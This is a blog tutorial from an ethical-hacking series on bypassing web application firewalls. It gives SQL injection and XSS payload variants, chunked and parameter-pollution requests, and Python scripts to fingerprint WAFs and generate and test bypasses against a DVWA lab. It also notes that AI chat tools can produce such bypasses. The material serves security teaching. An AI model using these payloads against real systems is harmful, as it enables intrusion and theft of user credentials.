Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

@scipio 70

about 2 months ago

StemSocial

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

What will I learn

What WAFs are and how they work: signature-based, behavioral, and cloud-based;
Identifying the WAF: fingerprinting ModSecurity, Cloudflare, AWS WAF, Akamai;
Bypass techniques: encoding, chunking, HTTP parameter pollution, Unicode normalization;
WAF rule testing methodology: finding what's blocked and what slips through;
Building a WAF bypass toolkit in Python;
Real-world WAF bypass case studies and what they teach us about defense in depth;
Why WAFs are a speed bump, not a wall -- and why fixing the actual vulnerability matters more.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
Your hacking lab from Episode 2 (Kali Linux);
Python 3 with requests (pip install requests);
ModSecurity with OWASP CRS (for lab testing -- installation instructions below);
The ambition to learn ethical hacking and security research.

Difficulty

Intermediate

Curriculum (of the `Learn Ethical Hacking` series):

Solutions to Episode 24 Exercises

Exercise 1 -- WordPress lab scan:

WPScan output (typical Docker WordPress):
- WordPress version: 6.4.x (from meta generator)
- Theme: twentytwentyfour (default)
- Plugins: contact-form-7 (detected via readme.txt)
- Users: admin (via REST API /wp-json/wp/v2/users)
- XML-RPC: enabled (system.multicall available)
- readme.html: accessible (information disclosure)

searchsploit results vary by plugin version.
Contact Form 7 has had stored XSS and file upload CVEs.

The key insight: a default WordPress installation with one popular plugin already has multiple enumeration vectors and potential vulnerabilities. Every additional plugin multiplies the attack surface.

Exercise 2 -- WordPress auditor:

import requests
import re

def audit_wp(url):
    # Version from generator meta
    resp = requests.get(url, timeout=10)
    if 'generator' in resp.text:
        ver = re.search(r'WordPress (\d+\.\d+\.?\d*)', resp.text)
        if ver: print(f"[*] WordPress {ver.group(1)}")

    # REST API users
    users = requests.get(f"{url}/wp-json/wp/v2/users", timeout=5)
    if users.status_code == 200:
        for u in users.json():
            print(f"[+] User: {u['slug']}")

    # XML-RPC
    xmlrpc = requests.post(f"{url}/xmlrpc.php",
        data='<?xml version="1.0"?><methodCall>'
             '<methodName>system.listMethods</methodName></methodCall>',
        timeout=5)
    if 'listMethods' in xmlrpc.text:
        print("[!] XML-RPC enabled -- brute force and DDoS vector")

    # Plugin detection
    common = ['contact-form-7', 'akismet', 'jetpack', 'woocommerce',
              'elementor', 'wordfence', 'yoast-seo', 'wp-mail-smtp',
              'classic-editor', 'really-simple-ssl', 'updraftplus']
    for plugin in common:
        r = requests.get(f"{url}/wp-content/plugins/{plugin}/readme.txt",
            timeout=5)
        if r.status_code == 200:
            v = re.search(r'Stable tag:\s*([\d.]+)', r.text, re.IGNORECASE)
            ver = v.group(1) if v else "unknown"
            print(f"[+] Plugin: {plugin} v{ver}")

    # Security headers
    for hdr in ['X-Frame-Options', 'Content-Security-Policy',
                'X-Content-Type-Options', 'Strict-Transport-Security']:
        if hdr.lower() not in {k.lower() for k in resp.headers}:
            print(f"[!] Missing: {hdr}")

Exercise 3 -- Plugin vulnerability research:

Three high-impact WP plugin vulnerabilities (2023-2024):
1. Elementor Pro (2023): Auth bypass + RCE, CVSS 9.8, 12M+ installs
2. WP Fastest Cache (2023): SQL injection, CVSS 9.8, 1M+ installs
3. Ultimate Member (2023): Privilege escalation to admin, CVSS 9.8, 200K+ installs
All three were exploited in the wild before patches were widely deployed.

These are ALL vulnerability classes we covered earlier in this series -- SQLi (episodes 12-13), XSS, auth bypass (episode 17) -- just wrapped inside WordPress plugins. The CMS doesn't introduce new vulnerability types. It introduces a new scale at which old vulnerability types can be exploited.

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

Over the past fourteen episodes we've built up quit an arsenal of web application attacks. SQL injection (episodes 12-13), XSS (14-15), CSRF (16), authentication bypass (17), SSRF (18), deserialization (19), file uploads (20), API abuse (21), business logic exploitation (22), client-side attacks (23), and CMS hacking (24). Every single one of those attacks targets a vulnerability in the application's code -- broken input validation, missing authorization checks, unsafe data handling. The attacks work because the APPLICATION is flawed.

But what happens when someone puts a security guard between you and the application?

A Web Application Firewall (WAF) sits in front of a web application, inspects every incoming HTTP request, and blocks anything that looks like an attack. Think of it as a bouncer at a club who checks your bag before letting you in. The bouncer has a list of banned items: knives, drugs, weapons. If your bag contains something on the list, you're turned away at the door. You never reach the club. The bartender never sees you. The vulnerability inside (maybe the bartender gives away free drinks if you ask nicely) is irrelevant because you didn't get past the bouncer.

The problem with bouncers? They follow rules. And if you know the rules, you can work around them. Wrap the knife in a towel. Put it in a different pocket. Disassemble it and bring it in pieces. The bouncer checks the bag, finds nothing on the list, waves you through. You reassemble the knife inside. The rules didn't change. Your presentation did.

That is WAF bypassing in a nutshell. The WAF has rules about what attack patterns look like. The attacker rephrases the attack so it doesn't match the rules. The application behind the WAF still processes the rephrased attack exactly the same way. The vulnerability hasn't gone anywhere -- the WAF just temporarily obscured it.

Een WAF is een vertraging, geen oplossing.

Having said that, WAFs are NOT useless. They stop automated scanners, drive-by attacks, script kiddies running Sqlmap with default settings, and the vast majority of opportunistic attacks that make up the background noise of the internet. For most web applications, a properly configured WAF eliminates 90-95% of incoming attack traffic. That's valuable. But that remaining 5-10%? That's the skilled attacker. The one doing a pentest. The one who reads episodes like this one and knows how the bouncer thinks ;-)

How WAFs Work

WAFs inspect HTTP requests (and sometimes responses) using three main approaches, and most modern WAFs combine all three:

Signature-based detection is the oldest and most common method. The WAF maintains a database of known attack patterns -- regular expressions and string matches that identify malicious content. If a request parameter contains UNION SELECT, that matches a SQL injection signature. If the URL contains <script>, that matches an XSS signature. If the request body contains ../../../etc/passwd, that matches a path traversal signature. Fast, deterministic, and easy to understand. Also the easiest to bypass, because changing the representation of the attack (without changing its meaning to the application) breaks the signature match.

Behavioral analysis looks at patterns over time rather than individual requests. Too many requests from one IP? Possible brute force or scanning. Requests to non-existent URLs in sequence? Possible directory enumeration. Same request pattern repeated across multiple IPs? Possible botnet. This approach catches automated tools (Nikto, Dirbuster, Sqlmap in default mode) because they generate predictable traffic patterns. Harder to bypass because the attacker needs to change their behavior, not just their payload encoding.

Machine learning / anomaly detection trains a model on "normal" traffic and flags deviations. If the application normally receives parameter values that are 10-50 characters of alphanumeric text, a 500-character string full of SQL syntax is anomalous. Some cloud WAFs (Cloudflare, AWS WAF with managed rules) use ML models trained on billions of requests across millions of sites. The upside: they can detect zero-day attack patterns that no signature exists for. The downside: false positives (legitimate requests flagged as attacks) and the possibility of training the model to accept malicious patterns by slowly normalizing them over time.

WAF architectures:

1. Reverse Proxy WAF (most common):
   Client -> WAF -> Web Server -> Application
   The WAF terminates the connection, inspects everything, then forwards
   clean requests. ModSecurity, AWS WAF, Cloudflare all work this way.

2. Host-based WAF (embedded):
   Client -> Web Server + WAF Module -> Application
   ModSecurity as an Apache/Nginx module runs inside the web server itself.
   Lower latency but limited to what the web server exposes.

3. Cloud WAF (SaaS):
   Client -> Cloud Edge (Cloudflare/Akamai/etc) -> Origin Server
   DNS points to the cloud provider, which proxies all traffic.
   The origin server IP must be hidden -- if the attacker finds
   the direct IP, they bypass the WAF entirely.

That last point about cloud WAFs is critical. Cloudflare only protects traffic that goes THROUGH Cloudflare. If you can discover the origin server's real IP address (through historical DNS records, email headers, subdomain enumeration, or certificate transparency logs -- all techniques from episode 4), you can send requests directly to the origin and skip the WAF completely. This is the most common WAF "bypass" in the wild and it's not even a WAF weakness -- it's a deployment misconfiguration.

WAF Identification

Before bypassing a WAF, you need to know which one you're dealing with. Different WAFs have different rule sets, different bypass techniques, and different error pages. Identifying the WAF tells you which playbook to use.

# wafw00f -- dedicated WAF fingerprinting tool (pre-installed on Kali)
wafw00f http://target.com

# Output examples:
# [+] The site http://target.com is behind Cloudflare (Cloudflare Inc.)
# [+] The site http://target.com is behind ModSecurity (SpiderLabs/Trustwave)
# [+] The site http://target.com is behind AWS WAF (Amazon)

# Manual fingerprinting via response headers
curl -sI http://target.com | grep -i -E "server|x-cdn|cf-|x-sucuri|x-waf"
# Cloudflare: Server: cloudflare, cf-ray header present
# Sucuri:     X-Sucuri-ID header
# Imperva:    X-CDN: Imperva
# AWS WAF:    x-amzn-waf-action header on blocks
# Akamai:     X-Akamai-Transformed header

# Trigger a WAF block and examine the error page
curl -v "http://target.com/?id=1'+UNION+SELECT+1,2,3--"
# Cloudflare: "Attention Required! | Cloudflare" with Ray ID
# ModSecurity: "403 Forbidden" with ModSecurity unique ID in body/logs
# AWS WAF: "403 Forbidden" with x-amzn-requestid header
# F5 BIG-IP ASM: custom block page with support ID
# Barracuda: "You have been blocked" with orange Barracuda branding

The fingerprinting tells you two things: (1) which ruleset the WAF is likely running (Cloudflare has different default rules than ModSecurity CRS which has different rules than AWS Managed Rules), and (2) whether the WAF is a cloud proxy (meaning origin IP bypass might work) or host-based (meaning you have to go through it).

#!/usr/bin/env python3
"""WAF fingerprinter -- identify the WAF protecting a target."""
import requests
import re

def fingerprint_waf(url):
    """Send probes and analyze responses to identify the WAF."""
    results = {"waf_detected": False, "waf_name": "Unknown", "evidence": []}

    # Normal request for headers
    try:
        resp = requests.get(url, timeout=10,
            headers={"User-Agent": "Mozilla/5.0"})
    except requests.exceptions.RequestException as e:
        return {"error": str(e)}

    headers = {k.lower(): v for k, v in resp.headers.items()}

    # Header-based identification
    checks = [
        ("cloudflare", lambda: "cf-ray" in headers or
            headers.get("server", "").lower() == "cloudflare"),
        ("Sucuri", lambda: "x-sucuri-id" in headers),
        ("Imperva/Incapsula", lambda: "x-cdn" in headers and
            "imperva" in headers.get("x-cdn", "").lower()),
        ("AWS WAF", lambda: "x-amzn-waf-action" in headers or
            "x-amzn-requestid" in headers),
        ("Akamai", lambda: "x-akamai-transformed" in headers),
        ("F5 BIG-IP", lambda: "x-cnection" in headers or
            "bigipserver" in headers.get("set-cookie", "").lower()),
        ("Barracuda", lambda: "barra_counter_session" in
            headers.get("set-cookie", "").lower()),
    ]

    for name, check in checks:
        if check():
            results["waf_detected"] = True
            results["waf_name"] = name
            results["evidence"].append(f"Header match: {name}")
            break

    # Trigger-based identification (send a known-bad request)
    try:
        bad = requests.get(f"{url}/?test=<script>alert(1)</script>",
            timeout=10, headers={"User-Agent": "Mozilla/5.0"})

        if bad.status_code == 403:
            results["waf_detected"] = True
            results["evidence"].append(f"403 on XSS probe")

            # Check block page content
            body = bad.text.lower()
            if "cloudflare" in body:
                results["waf_name"] = "Cloudflare"
            elif "modsecurity" in body or "mod_security" in body:
                results["waf_name"] = "ModSecurity"
            elif "sucuri" in body:
                results["waf_name"] = "Sucuri"
            elif "blocked" in body and "barracuda" in body:
                results["waf_name"] = "Barracuda"

        elif bad.status_code == 406:
            results["waf_detected"] = True
            results["evidence"].append("406 Not Acceptable on XSS probe")
            results["waf_name"] = "ModSecurity (406 response)"

    except:
        pass

    return results

if __name__ == "__main__":
    import sys
    url = sys.argv[1] if len(sys.argv) > 1 else None
    if not url:
        print("Usage: python3 waf_fingerprint.py <url>")
        sys.exit(1)

    result = fingerprint_waf(url)
    print(f"\n[*] Target: {url}")
    if result.get("waf_detected"):
        print(f"[+] WAF detected: {result['waf_name']}")
        for e in result.get("evidence", []):
            print(f"    {e}")
    else:
        print("[-] No WAF detected (or WAF is transparent)")

Bypass Technique #1: Encoding and Obfuscation

This is the bread and butter of WAF bypassing. The WAF matches strings. If the string doesn't match the signature, the request passes through. The application behind the WAF then decodes the string and processes it normally. The key insight: WAFs and applications often decode data at DIFFERENT stages and in DIFFERENT ways.

# Original SQL injection (blocked by every WAF on the planet):
1' UNION SELECT user,password FROM users -- -

# URL encoding (the application's URL parser decodes this):
1'%20UNION%20SELECT%20user,password%20FROM%20users%20--%20-

# Double URL encoding (works if the app decodes twice, or if a
# reverse proxy decodes once and the app decodes again):
1'%2520UNION%2520SELECT%2520user,password%2520FROM%2520users

# Case alternation (SQL is case-insensitive, WAF regex might not be):
1' UnIoN sElEcT user,password FrOm users -- -

# SQL comment injection (breaks up keywords):
1'/**/UNION/**/SELECT/**/user,password/**/FROM/**/users-- -

# Inline comments within keywords (MySQL specific):
1' UN/**/ION SEL/**/ECT user,password FR/**/OM users-- -

# Hex encoding for string values:
1' UNION SELECT user,password FROM users WHERE user=0x61646D696E-- -

# Using CHAR() instead of string literals:
1' UNION SELECT user,password FROM users WHERE user=CHAR(97,100,109,105,110)-- -

# Tab instead of space (many SQL parsers accept tabs):
1'%09UNION%09SELECT%09user,password%09FROM%09users--%09-

# Newline instead of space:
1'%0aUNION%0aSELECT%0auser,password%0aFROM%0ausers--%0a-

# Null bytes (some WAFs stop processing at null byte, app continues):
1'%00UNION SELECT user,password FROM users-- -

For XSS bypasses (as we partially covered in episode 15), the same principle applies:

# Original (blocked):
<script>alert(1)</script>

# Case alternation:
<ScRiPt>alert(1)</ScRiPt>

# Event handler instead of script tag:
<img src=x onerror=alert(1)>

# SVG-based (different parser):
<svg onload=alert(1)>

# HTML entity encoding:
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

# JavaScript protocol in href:
<a href="javascript:alert(1)">click</a>

# Template literal (backtick) injection:
<img src=x onerror=alert`1`>

The reason encoding bypasses work is fundamental: the WAF and the application use DIFFERENT parsers. The WAF has an approximation of SQL syntax, HTML syntax, JavaScript syntax. The database has the REAL SQL parser. The browser has the REAL HTML parser. When the WAF's approximation disagrees with the real parser about what a given input means, the attacker wins. This is an inherent problem with the WAF architecture -- it will NEVER be as accurate as the actual parsers it's trying to protect, because those parsers are the definitive authority on what constitutes valid input.

Bypass Technique #2: HTTP Parameter Pollution

Different web servers handle duplicate parameters differently, and WAFs may only inspect one of them:

# HTTP Parameter Pollution (HPP)
# Send the same parameter twice with payload split across them

# Apache/PHP: uses LAST value
# ASP.NET/IIS: CONCATENATES all values with comma
# Tomcat/Java: uses FIRST value
# Flask/Python: uses FIRST value

# Attack against Apache/PHP backend:
curl "http://target.com/search?q=harmless&q='+UNION+SELECT+1--"
# WAF might only inspect FIRST parameter value ("harmless")
# PHP processes LAST value ("' UNION SELECT 1--")

# Attack against ASP.NET backend:
curl "http://target.com/search?q=UNI&q=ON+SELECT+1--"
# ASP.NET concatenates: "UNI,ON SELECT 1--"
# WAF sees two harmless fragments individually
# Neither fragment matches a signature alone

HPP is particularly effective against WAFs that inspect individual parameter values in isolation without considering how the backend framework will reassemble them. The WAF sees q=harmless -- nothing suspicious. The application sees q=' UNION SELECT 1-- -- SQL injection.

Bypass Technique #3: Chunked Transfer Encoding

Break the payload across HTTP chunks so the WAF sees individual fragments that don't match any signature:

POST /search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

4
q=1'
5
+UNIO
8
N+SELEC
9
T+1,2,3-
3
- -
0

Each chunk is a harmless fragment. q=1' is just a partial parameter. +UNIO matches nothing. N+SELEC matches nothing. The WAF processes chunks individually and finds nothing suspicious. The web server reassembles the chunks into the full request body: q=1' UNION SELECT 1,2,3-- -. SQL injection.

This works against WAFs that don't reassemble chunked requests before inspection. Most modern cloud WAFs (Cloudflare, AWS WAF) DO reassemble chunks now. But many on-premise WAFs, older ModSecurity configurations, and custom WAF solutions still inspect chunks individually. You won't know until you try.

Bypass Technique #4: Content-Type Manipulation

WAFs often only inspect request bodies in expected content types. If the WAF expects application/x-www-form-urlencoded or multipart/form-data (the standard form content types), sending the payload as JSON might bypass inspection entirely:

# Normal form submission (WAF inspects this):
curl -X POST http://target.com/login \
  -d "username=admin'+OR+1=1--&password=x"

# Same payload as JSON (WAF might not inspect this):
curl -X POST http://target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin'\'' OR 1=1 --", "password": "x"}'

# XML content type (another variant):
curl -X POST http://target.com/login \
  -H "Content-Type: application/xml" \
  -d '<login><username>admin'\'' OR 1=1 --</username><password>x</password></login>'

This only works if the application accepts multiple content types for the same endpoint. Many modern frameworks (Express, Django, Flask, Spring) parse JSON, form-urlencoded, and XML transparently -- the application code sees the same parameters regardless of content type. The WAF, configured to inspect form data, doesn't know the application also accepts JSON.

Bypass Technique #5: HTTP Method and Version Tricks

Some WAFs only inspect certain HTTP methods or don't handle protocol edge cases:

# WAF might only inspect GET and POST, not other methods
# Some apps treat HEAD like GET but return no body
curl -X HEAD "http://target.com/?id=1'+UNION+SELECT+1--"

# HTTP/0.9 request (no headers, ancient protocol, some servers still support)
printf 'GET /search?q=<script>alert(1)</script>\r\n' | nc target.com 80
# HTTP/0.9 has no Content-Type, no headers -- just raw response
# The WAF might not know how to handle this

# Overriding the method via header (if the app supports it)
curl -X POST http://target.com/ \
  -H "X-HTTP-Method-Override: PUT" \
  -d '{"id": "1'\'' UNION SELECT 1--"}'

Building a WAF Bypass Toolkit

Here's a comprehensive payload generator that creates multiple bypass variants from a single base payload:

#!/usr/bin/env python3
"""
waf_bypass.py -- WAF bypass payload generator and tester.
Takes a base payload and generates encoded variants, then
optionally tests each against a target URL.
"""
import urllib.parse
import sys
import requests

def generate_bypasses(payload):
    """Generate WAF bypass variants of a payload."""
    variants = []

    # Original
    variants.append(("Original", payload))

    # URL encoding
    variants.append(("URL encoded",
        urllib.parse.quote(payload)))

    # Double URL encoding
    variants.append(("Double URL encoded",
        urllib.parse.quote(urllib.parse.quote(payload))))

    # Case alternation
    alt = ""
    for i, c in enumerate(payload):
        alt += c.upper() if i % 2 == 0 else c.lower()
    variants.append(("Case alternation", alt))

    # SQL comment injection (replace spaces with /**/)
    commented = payload.replace(" ", "/**/")
    variants.append(("Comment injection", commented))

    # Tab substitution
    variants.append(("Tab substitution",
        payload.replace(" ", "\t")))

    # Newline substitution
    variants.append(("Newline injection",
        payload.replace(" ", "%0a")))

    # Null byte prefix
    variants.append(("Null byte prefix",
        "%00" + payload))

    # Mixed encoding (partial URL encode)
    mixed = ""
    for i, c in enumerate(payload):
        if c.isalpha() and i % 3 == 0:
            mixed += urllib.parse.quote(c)
        else:
            mixed += c
    variants.append(("Mixed encoding", mixed))

    # Inline comments within SQL keywords
    kw_split = payload
    for kw in ["UNION", "SELECT", "FROM", "WHERE",
               "INSERT", "UPDATE", "DELETE", "DROP"]:
        if kw.upper() in kw_split.upper():
            mid = len(kw) // 2
            replacement = kw[:mid] + "/**/" + kw[mid:]
            kw_split = kw_split.replace(kw, replacement)
            kw_split = kw_split.replace(kw.lower(), replacement.lower())
    variants.append(("Keyword splitting", kw_split))

    return variants


def test_bypasses(url, param, payload, verbose=False):
    """Test each bypass variant against a live target."""
    variants = generate_bypasses(payload)

    print(f"\n{'='*60}")
    print(f"WAF Bypass Test: {url}")
    print(f"Parameter: {param}")
    print(f"Base payload: {payload}")
    print(f"{'='*60}\n")

    blocked = 0
    passed = 0

    for name, variant in variants:
        try:
            resp = requests.get(url, params={param: variant},
                timeout=10, headers={"User-Agent": "Mozilla/5.0"})
            status = resp.status_code

            if status in [403, 406, 429, 503]:
                blocked += 1
                marker = "BLOCKED"
            elif status == 200:
                passed += 1
                marker = "PASSED"
            else:
                marker = f"STATUS {status}"

            print(f"  [{marker}] {name}")
            if verbose:
                print(f"           {variant[:80]}...")

        except requests.exceptions.RequestException as e:
            print(f"  [ERROR] {name}: {e}")

    print(f"\n  Summary: {passed} passed, {blocked} blocked, "
          f"{len(variants)} total")
    if passed > 0:
        print(f"  [!] {passed} variant(s) bypassed the WAF")


if __name__ == "__main__":
    # Generate mode (no URL)
    if len(sys.argv) == 2 and not sys.argv[1].startswith("http"):
        payload = sys.argv[1]
        for name, variant in generate_bypasses(payload):
            print(f"  [{name}]")
            print(f"    {variant}\n")

    # Test mode (URL + param + payload)
    elif len(sys.argv) >= 4:
        url = sys.argv[1]
        param = sys.argv[2]
        payload = sys.argv[3]
        verbose = "--verbose" in sys.argv
        test_bypasses(url, param, payload, verbose)

    else:
        print("Usage:")
        print("  Generate: python3 waf_bypass.py '<payload>'")
        print("  Test:     python3 waf_bypass.py <url> <param> '<payload>' [--verbose]")
        sys.exit(1)

Run it in generate mode to see all variants of a payload, or in test mode against a ModSecurity instance in your lab to see which ones get through:

# Generate variants
python3 waf_bypass.py "1' UNION SELECT user,password FROM users-- -"

# Test against ModSecurity in your lab
python3 waf_bypass.py http://192.168.56.101/dvwa/vulnerabilities/sqli/ id \
  "1' UNION SELECT user,password FROM users-- -" --verbose

WAF Testing Methodology

When you encounter a WAF during a pentest, follow this systematic approach:

1. IDENTIFY the WAF
   - Run wafw00f
   - Check response headers
   - Trigger a block and examine the error page
   - Note: if it's a cloud WAF, check for origin IP bypass FIRST

2. BASELINE the rules
   - Send known-good requests, confirm they pass
   - Send known-bad requests, confirm they're blocked
   - Document the baseline: what gets through, what doesn't

3. ENUMERATE the ruleset
   - Test individual keywords: UNION, SELECT, <script>, alert(
   - Which keywords trigger blocks? Which are allowed?
   - Are blocks based on keywords alone or combinations?
   - Is the detection case-sensitive?

4. FIND gaps
   - Test encoding variants (URL, double, hex, Unicode)
   - Test keyword alternatives (SQL synonyms, JS event handlers)
   - Test HTTP-level bypasses (HPP, chunking, content-type)
   - Test each bypass technique independently first

5. CHAIN bypasses
   - Combine techniques that individually work
   - Example: case alternation + comment injection + hex strings
   - Each layer of encoding reduces the payload's similarity
     to known signatures

6. VERIFY exploitation
   - A bypass that gets through the WAF is only useful if the
     underlying vulnerability is exploitable with that encoding
   - Test the bypass against the actual vulnerability, not just
     WAF passthrough

7. DOCUMENT everything
   - Which WAF, which version/ruleset
   - Which bypasses worked
   - Which payloads successfully exploited the vulnerability
   - Remediation: fix the underlying vuln, don't rely on WAF tuning

The Fundamental Problem with WAFs

Here we go -- this is the part that matters most.

WAFs try to understand SQL, HTML, JavaScript, and XML syntax by pattern matching HTTP parameters. But they are NOT actual parsers for those languages. They are approximations. The MySQL parser is the definitive authority on what constitutes valid MySQL syntax. The browser's HTML parser is the definitive authority on what constitutes renderable HTML. The Python/PHP/Java runtime is the definitive authority on what constitutes executable code.

When the WAF's approximation disagrees with the actual parser -- and it WILL disagree, because the actual parsers are enormously complex with decades of edge cases, legacy behaviors, and implementation-specific quirks -- the attacker exploits the disagreement. The WAF says "this doesn't look like SQL injection." The MySQL parser says "this is perfectly valid SQL." Both are correct, from their own perspective. The attacker wins because the WAF's perspective doesn't matter -- only the database's perspective does.

This is sometimes called the parser differential problem, and it's the reason WAFs are fundamentally limited as a security control. No WAF can ever be as accurate as the parser it's protecting, because to be that accurate it would need to BE that parser -- at which point it's just the application itself.

De WAF probeert SQL te begrijpen. De database begrijpt SQL al.

Real-world examples of parser differentials:

# MySQL supports C-style comments with version markers:
SELECT /*!50000 user,password*/ FROM users
# This is valid SQL that executes the commented code on MySQL >= 5.0
# The WAF sees a comment and ignores the content

# PostgreSQL dollar-sign quoting:
SELECT $tag$<script>alert(1)</script>$tag$
# This is a valid string literal in PostgreSQL
# The WAF doesn't recognize $tag$ as a quote delimiter

# MySQL backtick identifiers:
SELECT `user`,`password` FROM `users`
# Backticks are MySQL-specific identifier quotes
# Some WAFs don't recognize backtick-quoted identifiers

# JavaScript template literals:
<img src=x onerror=alert`1`>
# Backtick invocation works in modern browsers
# Many WAFs only look for parentheses after function names

Real-World WAF Bypass Case Studies

Cloudflare bypass (2019): Researchers discovered that Cloudflare's WAF could be bypassed using the globalThis object in JavaScript:

<svg onload=globalThis[`al`+`ert`](1)>

Cloudflare's rules looked for alert(, prompt(, confirm( as XSS signatures. Using bracket notation with string concatenation to call the function avoided all signatures. Cloudflare patched this specific bypass within days, but the cat-and-mouse game continues -- new bypasses are found regularly.

AWS WAF bypass via Unicode normalization (2020): AWS WAF didn't normalize Unicode before inspection, but the application (running on .NET) did. Sending ＜script＞alert(1)＜/script＞ (using fullwidth Unicode characters U+FF1C and U+FF1E instead of regular < and >) passed through AWS WAF because the Unicode chars didn't match the <script> signature. The .NET application normalized them to ASCII angle brackets and the XSS fired.

ModSecurity CRS bypass via multipart (2021): The OWASP Core Rule Set for ModSecurity had a parsing gap in multipart/form-data processing. By crafting specific boundary strings and content-disposition headers, the payload could be placed in a section that ModSecurity's parser skipped but the application's parser processed.

Every one of these bypasses was eventually patched. And every patch was followed by new bypasses. This is the cycle: researchers find gaps between the WAF parser and the application parser, the WAF vendor patches the gap, the gap reappears in a different form because the underlying parser differential problem hasn't changed. The WAF is fighting an endless approximation battle against parsers that define reality.

Setting Up ModSecurity for Lab Practice

You should test bypass techniques against a real WAF in your lab, not against production systems. Here's how to set up ModSecurity with the OWASP Core Rule Set (CRS) in Docker:

# Pull the official ModSecurity + CRS Docker image
docker pull owasp/modsecurity-crs:apache

# Run with DVWA as the backend
docker run -d --name modsec-waf \
  -p 8080:80 \
  -e BACKEND=http://host.docker.internal:42001 \
  -e PARANOIA=1 \
  owasp/modsecurity-crs:apache

# PARANOIA levels:
# 1 = minimal false positives, basic protection (default)
# 2 = moderate -- blocks more attacks, some false positives
# 3 = aggressive -- blocks most attacks, more false positives
# 4 = paranoid -- blocks almost everything, many false positives

# Start DVWA behind the WAF
docker run -d --name dvwa -p 42001:80 vulnerables/web-dvwa

# Now access DVWA through the WAF at http://localhost:8080
# Direct access at http://localhost:42001 bypasses the WAF (for comparison)

With this setup you can test payloads through the WAF (port 8080) and directly against DVWA (port 42001). If a payload gets blocked by the WAF, try your bypass variants. If a variant gets through the WAF AND exploits the vulnerability in DVWA, you've confirmed a working WAF bypass.

The AI Slop Connection

Coming back to the thread from episode 6. WAF bypass actually has a unique relationship with AI-generated code, and it works both ways.

On the defense side: AI-generated web applications almost never deploy with a WAF, because WAFs are infrastructure configuration and AI models generate application code. Ask an AI to "build a web application with user login" and it produces the Flask/Express/Django app with the SQL injection in the login query. It does NOT produce the nginx config, the ModSecurity rules, the Cloudflare setup, or the AWS WAF policy. The application launches vulnerable with zero protection between it and the internet.

On the attack side: AI models are getting good at generating WAF bypass payloads. They've been trained on the entire corpus of public WAF bypass research, CTF writeups, and security conference presentations. An attacker can ask for "SQL injection payloads that bypass ModSecurity CRS level 2" and get working variants. This means the barrier to WAF bypassing is dropping -- it's no longer just expert pentesters who can bypass WAFs, it's anyone with access to a chat interface. The defense implication: if AI can generate bypasses, the WAF alone is even less reliable as a security boundary than it was before.

Having said that, the correct response to "WAF bypasses are getting easier" is NOT "use a better WAF." It's "fix the underlying vulnerabilities." A WAF is a compensating control -- a temporary measure while you fix the real problem. The SQL injection in your login query doesn't become less dangerous because a WAF sits in front of it. It becomes slightly harder to exploit. "Slightly harder" is not a security strategy ;-)

De muur wordt dunner. Repareer het huis.

Exercises

Exercise 1: Set up ModSecurity with OWASP CRS in your lab using the Docker instructions from this episode. Configure it with PARANOIA=1 (default). Test 10 SQL injection payloads from episodes 12-13 through the WAF and directly against DVWA (bypassing the WAF). Document which ones are blocked and which pass through. Then apply encoding bypass techniques (URL encoding, double encoding, comment injection, case alternation) and test again. How many previously-blocked payloads now succeed through the WAF? Increase PARANOIA to 2 and repeat -- do the same bypasses still work?

Exercise 2: Write a Python script called waf_tester.py that takes a URL, a parameter name, and a base payload. It should: (a) generate all bypass variants using the generator from this episode, (b) send each variant to the target URL, (c) classify each response as BLOCKED (403/406/429), PASSED (200), or ERROR, (d) for variants that PASSED, check the response body for indicators that the vulnerability was triggered (SQL error messages like "syntax error" or "mysql", reflected XSS content, etc.), (e) produce a summary report showing which variants bypassed the WAF and which actually exploited the underlying vulnerability. Test it against your ModSecurity + DVWA lab setup.

Exercise 3: Research three major cloud WAF providers (Cloudflare, AWS WAF, Akamai). For each one, document: the detection methods used (signature, behavioral, ML), what the default/managed ruleset covers, how custom rules are configured, known public bypass techniques that have been disclosed (check security conference talks and research papers), and the pricing model. Write your comparison in ~/lab-notes/waf-comparison.md. Based on your research: which WAF would be hardest to bypass during a pentest, and why?

Een WAF is een bewaker. Geen muur. En bewakers slapen soms.

@scipio

stem stemsocial steemstem security programming

0.000

0 comments

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

What will I learn

Requirements

Difficulty

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 24 Exercises

Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards

How WAFs Work

WAF Identification

Bypass Technique #1: Encoding and Obfuscation

Bypass Technique #2: HTTP Parameter Pollution

Bypass Technique #3: Chunked Transfer Encoding

Bypass Technique #4: Content-Type Manipulation

Bypass Technique #5: HTTP Method and Version Tricks

Building a WAF Bypass Toolkit

WAF Testing Methodology

The Fundamental Problem with WAFs

Real-World WAF Bypass Case Studies

Setting Up ModSecurity for Lab Practice

The AI Slop Connection

Exercises

Een WAF is een bewaker. Geen muur. En bewakers slapen soms.

Curriculum (of the `Learn Ethical Hacking` series):